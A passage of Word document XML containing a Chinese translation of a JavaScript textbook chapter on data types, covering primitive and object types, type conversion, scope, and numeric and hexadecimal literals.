        <w:t>节来帮助理解本章内容。后续章节会更深入地讲解。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的数据类型分为两类：原始类型（</w:t>
      </w:r>
      <w:r>
        <w:t>primitive type</w:t>
      </w:r>
      <w:r>
        <w:t>）和对象类型（</w:t>
      </w:r>
      <w:r>
        <w:t>object type</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的原始类型包括数字、字符串和布尔值，本章会有单独的章节专门讲述</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的数字</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>见</w:t>
      </w:r>
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>和字</w:t>
      </w:r>
      <w:r>
        <w:t>符串</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>见</w:t>
      </w:r>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>，布尔值将会在</w:t>
      </w:r>
      <w:r>
        <w:t>3.3</w:t>
      </w:r>
      <w:r>
        <w:t>节讲解。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中有两个特殊的原始值：</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>（空）和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>（未定义），它们不是数字、字符串和布尔值。它们通常分别代表了各自特殊类型的唯一的成员。</w:t>
      </w:r>
      <w:r>
        <w:t>3.4</w:t>
      </w:r>
      <w:r>
        <w:t>节将会详细讲解</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中除了数字、字符串、布尔值、</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>之外的就是对象了。对象（</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>）是属性（</w:t>
      </w:r>
      <w:r>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:t>）的集合，每个属性都由</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（值可以是原始值，比如数字、字符串，也可以是对象）构成。其中有一个比较特殊的对</w:t>
      </w:r>
      <w:r>
        <w:t>象</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>全局对象（</w:t>
      </w:r>
      <w:r>
        <w:t>global object</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>会在</w:t>
      </w:r>
      <w:r>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍，第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章会有更完整详细的描述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>普通的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>命名值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的无序集合。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>同样定义了一种特殊对象</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>数组（</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>），表示带编号的值的有序集合。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>为数组定义了专用的语法，使数组拥有一些和普通对象不同的特有行为特性。第</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>章将专门讲述数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>还定义了另一种特殊对象</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>函数。函数是具有与它相关联的可执行代码的对象，通过调用函数来运行可执行代码，并返回运算结果。和数组一样，函数的行</w:t>
      </w:r>
      <w:r>
        <w:t>为特征和其他对象都不一样。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>为使用函数定义了专用语法。对于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数来讲，最重要的是，它们都是真值，并且</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>可以将它们当做普通对象来对待。第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章会专门讲述函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果函数用来初始化（使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>运算符）一个新建的对象，我们称之为构造函数（</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>）。每个构造函数定义了一类（</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>）对象</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>由构造函数初始化的对象组成的集合。类可以看做</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>是对象类型的子类型。除了数组（</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>）类和函数（</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>）类之外，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心定义了其</w:t>
      </w:r>
      <w:r>
        <w:t>他三种有用的类。日期（</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>）类定义了代表日期的对象。正则（</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>）类定义了表示正则表达式（一种强大的模式匹配工具，在第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章会讲到）的对象。错误（</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>）类定义了那些表示</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中运行时错误和语法错误的对象。可以通过定义自己的构造函数来定义需要的类。这会在第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章讲述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器有自己的内存管理机制，可以自动对内存进行垃圾回收（</w:t>
      </w:r>
      <w:r>
        <w:t>garbage collection</w:t>
      </w:r>
      <w:r>
        <w:t>）。这意味着程序可以按需创建对象，程序员则不必担心这些对象的销毁和内存回收。当不再有任何引用指向一个</w:t>
      </w:r>
      <w:r>
        <w:t>对象，解释器就会知道这个对象没用了，然后自动回收它所占用的内存资源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是一种面向对象的语言。不严格地讲，这意味着我们不用全局的定义函数去操作不同类型的值，数据类型本身可以定义方法（</w:t>
      </w:r>
      <w:r>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:t>）来使用值。例如，要对数组</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>中的元素进行排序，不必要将</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>传入</w:t>
      </w:r>
      <w:r>
        <w:t>sort()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，而是调用</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>的一个方法</w:t>
      </w:r>
      <w:r>
        <w:t>sort()</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.sort();//sort(a)</w:t>
      </w:r>
      <w:r>
        <w:t>的面向对象的版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章将会讲述方法的定义。从技术上讲，只有</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象才能拥有方法。然而，数字、字符串和布尔值也可以拥有自己的方法（</w:t>
      </w:r>
      <w:r>
        <w:t>3.6</w:t>
      </w:r>
      <w:r>
        <w:t>节解释其工作机制）。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，只有</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>是无法拥有方法的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的类型可以分为原始类型和对象类型，也可分为可以拥有方法的类型和不能拥有方法的类型，同样可分为可变（</w:t>
      </w:r>
      <w:r>
        <w:t>mutable</w:t>
      </w:r>
      <w:r>
        <w:t>）类型和不可变（</w:t>
      </w:r>
      <w:r>
        <w:t>immutable</w:t>
      </w:r>
      <w:r>
        <w:t>）类型。可变类型的值是可修改的。对象和数组属于可变类型：</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序可以更改对象属性值和数组元素的值。数字、布尔值、</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>属于不可变类型</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>比如，修改一个数值的内容本身就说不通。字符串可以看成由字符组成的数</w:t>
      </w:r>
      <w:r>
        <w:t>组，你可能会认为它是可变的。然而在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，字符串是不可变的：可以访问字符串任意位置的文本，但</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>并未提供修改已知字符串的文本内容的方法。</w:t>
      </w:r>
      <w:r>
        <w:t>3.7</w:t>
      </w:r>
      <w:r>
        <w:t>节会详细讲解可变类型和不可变类型的不同之处。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>可以自由地进行数据类型转换。比如，如果在程序期望使用字符串的地方使用了数字，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会自动将数字转换为字符串。如果在期望使用布尔值的地方使用了非布尔值，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>也会进行相应的转换。类型转换规则将在</w:t>
      </w:r>
      <w:r>
        <w:t>3.8</w:t>
      </w:r>
      <w:r>
        <w:t>节讲述。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中灵活的类型转换规则对</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>判断相等</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>equality</w:t>
      </w:r>
      <w:r>
        <w:t>）的定义亦</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>有影响。等号运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>所进行的类型转换细节将在</w:t>
      </w:r>
      <w:r>
        <w:t>3.8.1</w:t>
      </w:r>
      <w:r>
        <w:t>节详细描述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>变量是无类型的</w:t>
      </w:r>
      <w:r>
        <w:t>(untyped)</w:t>
      </w:r>
      <w:r>
        <w:t>，变量可以被赋予任何类型的值，同样一个变量也可以重</w:t>
      </w:r>
      <w:r>
        <w:t>新赋予不同类型的值。使用</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>关键字来声明（</w:t>
      </w:r>
      <w:r>
        <w:t>declare</w:t>
      </w:r>
      <w:r>
        <w:t>）变量。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>采用词法作用域（</w:t>
      </w:r>
      <w:r>
        <w:t>lexical scoping</w:t>
      </w:r>
      <w:r>
        <w:t>）。不在任何函数内声明的变量称做全局变量（</w:t>
      </w:r>
      <w:r>
        <w:t>global variable</w:t>
      </w:r>
      <w:r>
        <w:t>），它在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中的任何地方都是可见的。在函数内声明的变量具有函数作用域（</w:t>
      </w:r>
      <w:r>
        <w:t>function scope</w:t>
      </w:r>
      <w:r>
        <w:t>），并且只在函数内可见。变量声明和作用域将会在</w:t>
      </w:r>
      <w:r>
        <w:t>3.9</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>3.10</w:t>
      </w:r>
      <w:r>
        <w:t>节详细讲解。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="3_1_Shu_Zi_"/>
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　数字</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和其他编程语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>不同，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>不区分整数值和浮点数值。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的所有</w:t>
      </w:r>
      <w:r>
        <w:t>数字均用浮点数值表示。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>采用</w:t>
      </w:r>
      <w:r>
        <w:t>IEEE 754</w:t>
      </w:r>
      <w:r>
        <w:t>标准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>定义的</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:t>位浮点格式表示数字，这意味着它能表示的最大值是</w:t>
      </w:r>
      <w:r>
        <w:t>±1.7976931348623157×10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5Text"/>
        </w:rPr>
        <w:t>308</w:t>
      </w:r>
      <w:r>
        <w:t>，最小值是</w:t>
      </w:r>
      <w:r>
        <w:t>±5×10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5Text"/>
        </w:rPr>
        <w:t>-324</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>按照</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的数字格式，能够表示的整数范围是从</w:t>
      </w:r>
      <w:r>
        <w:t>-9 007 199 254 740 992</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>9 007 199 254 740 992(</w:t>
      </w:r>
      <w:r>
        <w:t>即</w:t>
      </w:r>
      <w:r>
        <w:t>-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5Text"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5Text"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>，包含边界值。如果使用了超过此范围的整数，则无法保证低位数字的精</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>度。然而需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中实际的操作（比如数组索引</w:t>
      </w:r>
      <w:r>
        <w:t>，以及第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>章讲到的位操作符）则是基于</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>位整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当一个数字直接出现在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中，我们称之为数字直接量（</w:t>
      </w:r>
      <w:r>
        <w:t>numeric literal</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>支持多种格式的数字直接量，在接下来的小节中会有讨论。注意，在任何数字直接量前添加负号（</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>）可以得到它们的负值。但负号是一元求反运算符（参见第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>章），并不是数字直接量语法的组成部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="3_1_1_Zheng_Xing_Zhi_Jie_Liang_"/>
      <w:r>
        <w:t>3.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　整型直接量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中，用一个数字序列表示一个十进制整数。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>10000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了十进制的整型直接量，</w:t>
      </w:r>
      <w:r>
        <w:t>Jav</w:t>
      </w:r>
      <w:r>
        <w:t>aScript</w:t>
      </w:r>
      <w:r>
        <w:t>同样能识别十六进制（以</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>为基数）值。所谓十六进制的直接量是指以</w:t>
      </w:r>
      <w:r>
        <w:t>"0x"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"0X"</w:t>
      </w:r>
      <w:r>
        <w:t>为前缀，其后跟随十六进制数串的直接量。十六进制值是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>之间的数</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>字和</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>）～</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>）之间的字母构成，</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>的字母对应的表示数字</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>。下面是十六进制整型直接量的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0xff//15*16+15=255(</w:t>
      </w:r>
      <w:r>
        <w:t>十进制</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0xCAFE911</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准不支持八进制直接量，但</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的某些实现可以允许采用八进制（基数为</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>）形式表示整数。八进制直接量以数字</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
